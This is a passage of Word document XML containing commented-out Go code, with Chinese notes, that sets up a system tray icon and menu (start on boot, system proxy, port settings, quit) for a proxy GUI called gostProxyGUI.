          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>托盘程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//systray.Run(onReady, nil)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//func onReady() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>iconBytes, err := ioutil.ReadFile("icon.ico")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>处理错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>systray.SetIcon(iconBytes)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>托盘名称，暂时未看到效果，不清楚该字符串显示在哪里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>systray.SetTitle("gostProxyGUI")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>鼠标指针移动，默认显示字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>systray.SetTooltip("gostProxyGUI")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>添加点击托盘菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>go func() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>【添加一级菜单内容】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>暂不清楚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray.AddMenuItem()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tooltip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>有何效果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>开机启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>mStartOnWithSystem := systray.AddMenuItemCheckbox("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>开机启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>", "", false)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>系统代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>mSystemProxy := systray.AddMenuItemCheckbox("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>系统代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>", "", false)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>端口监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>mPort := systray.AddMenuItem("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>端口设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>", "")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>仅在托盘菜单中添加分割线，仅美观作用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>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t>systray.AddSeparator()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t>mQuit := systray.AddMenuItem("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>", "")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>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t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>从写法上看，为了下面托盘的执行部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>部分的代码简洁美观，此处定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
